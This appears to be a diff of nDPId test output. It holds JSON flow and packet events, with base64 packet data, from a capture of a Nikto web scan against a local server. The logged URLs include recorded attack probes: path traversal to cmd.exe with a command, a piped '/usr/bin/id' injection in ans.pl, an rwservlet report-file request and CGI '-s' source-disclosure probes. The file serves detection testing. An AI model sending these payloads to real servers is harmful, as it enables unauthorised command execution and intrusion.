+01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003302)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":1,"flow_last_seen":1576420277905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"ts_msec":1576420277905,"pkt":"AAAAAAAAAAAAAAAACABFAADdGS5AAEAGIut\/AAABfwAAAcd6H5B05SBpiRPNwoAYAED+0QAAAQEICp1m\/7mdZv+5R0VUIC9hbnMucGw\/cD0uLi8uLi8uLi8uLi8uLi91c3IvYmluL2lkfCZibGFoIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003370)"}}
+01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003370)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":1576420277907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1576420277907,"pkt":"AAAAAAAAAAAAAAAACABFAADhaxBAAEAG0QR\/AAABfwAAAcd8H5CT4lJLpEBlJ4AYAED+1QAAAQEICp1m\/7udZv+7R0VUIC9hbnMvYW5zLnBsP3A9Li4vLi4vLi4vLi4vLi4vdXNyL2Jpbi9pZHwmYmxhaCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003371)"}}
+01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003371)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":1576420277908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"ts_msec":1576420277908,"pkt":"AAAAAAAAAAAAAAAACABFAAEIG05AAEAGIKB\/AAABfwAAAcd+H5BZWCIKm5\/s0oAYAED+\/AAAAQEICp1m\/7ydZv+8R0VUIC9yZXBvcnRzL3J3c2VydmxldD9zZXJ2ZXI9cmVwc2VydityZXBvcnQ9L3RtcC9oYWNrZXIucmRmK2Rlc3R5cGU9Y2FjaGUrZGVzZm9ybWF0PVBERiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzQzNykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/reports\/rwservlet?server=repserv+report=\/tmp\/hacker.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003437)"}}
+01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/reports\/rwservlet?server=repserv+report=\/tmp\/hacker.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003437)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":1576420277909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277909,"pkt":"AAAAAAAAAAAAAAAACABFAAC9phtAAEAGlh1\/AAABfwAAAceAH5B1J59d+HsAr4AYAED+sQAAAQEICp1m\/72dZv+9R0VUIC9vcGVuLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ4KQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/open.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006448)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/open.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006448)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_packet_id":1,"flow_last_seen":1576420277910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277910,"pkt":"AAAAAAAAAAAAAAAACABFAADA+2VAAEAGQNB\/AAABfwAAAceCH5AHKcInz6YgT4AYAED+tAAAAQEICp1m\/76dZv++R0VUIC9meDI5aWQxLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id1.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006449)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id1.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006449)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":1576420277912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277912,"pkt":"AAAAAAAAAAAAAAAACABFAADAC6pAAEAGMIx\/AAABfwAAAceEH5BX8jLvG2MI1oAYAED+tAAAAQEICp1m\/8CdZv\/AR0VUIC9meDI5aWQyLnR4dCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjQ1MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id2.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006450)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id2.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006450)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":1576420277913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"ts_msec":1576420277913,"pkt":"AAAAAAAAAAAAAAAACABFAAC4Ym1AAEAG2dB\/AAABfwAAAceGH5BoAlsuZzuA64AYAED+rAAAAQEICp1m\/8GdZv\/BR0VUIC8\/LXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY1MjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006523)"}}
+01042{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006523)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":1576420277917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277917,"pkt":"AAAAAAAAAAAAAAAACABFAADBkMVAAEAGq29\/AAABfwAAAceIH5D4rqmFil0FBYAYAED+tQAAAQEICp1m\/8WdZv\/ER0VUIC9sb2dpbi5waHA\/LXMgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjUyNCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006524)"}}
